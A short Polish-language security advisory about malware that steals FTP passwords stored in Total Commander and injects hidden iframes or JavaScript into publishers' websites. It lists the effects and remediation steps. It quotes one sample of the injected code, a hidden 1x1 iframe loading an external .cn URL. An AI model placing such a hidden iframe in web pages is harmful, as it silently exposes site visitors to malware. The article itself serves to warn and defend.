Złośliwy wirus dzięki dziurom w programie Total Commander naraża wydawców internetowych na poważne straty. Ostatnio zwiększył swoją aktywność.
Wirus wykrada hasła z programu Total Commander i dzięki temu ma dostęp do wielu kont internetowych. Jest wysoce prawdopodobne, że problem dotyczy także innych klientów FTP (CuteFTP, FAR Manager), ale z racji ogromnej popularności Total Commandera to właśnie jemu przypisywana jest ta sytuacja.
Następnie za pomocą połączenia z kontem FTP oprogramowanie dokleja do witryn złośliwy kod. Najczęściej jest to ukryta ramka iFrame lub skrypt JavaScript.
Przykładowy doklejony kod
<iframe src="https://cheapslotplay.cn/in.cgi?income48" width=1 height=1 style="visibility: hidden"></iframe>
W wyniku tych działań strony internetowe mogą być kompletnie sparaliżowane. Zarażone witryny mogą:
- przekierowywać na strony zewnętrzne (często o tematyce erotycznej);
- instalować swoim użytkownikom oprogramowanie typu malware;
- zostać całkowicie unieruchomione (poprzez modyfikacje plików systemowych).
Złośliwe oprogramowanie może poza samymi witrynami zagrażać także stabilności pracy samego konta lub całego serwera. Dzięki posiadanym danym do konta może zainstalować tam własne skrypty i przeprowadzać na przykład masową wysyłkę spamu, dokonywać ataków typu brute force czy tworzyć fikcyjne strony bankowe (phishing).
O konsekwencje nie trudno się domyślić. Często witryna jest wykrywana i zgłaszana jako podejrzana – zamiast witryny użytkownicy Firefoksa widzą komunikat „Witryna zgłoszona jako dokonująca ataków“, a pozostali są narażeni na zawirusowanie.
Jednym z głośniejszych przykładów tego typu była witryna , która padła ofiarą omawianego wirusa. Pisaliśmy o tym problemie już pod koniec lutego w artykule . Ostatnio jednak przypadki zarażeń i nowych ataków znacznie się nasiliły.
Jak sobie poradzić z tym problemem?
- usunąć pliki z zainfekowanego komputera wydawcy (najlepiej kilkoma skanerami)
- zmienić hasła do FTP
- jeśli możliwe to wpisywać je ręcznie do połączenia FTP
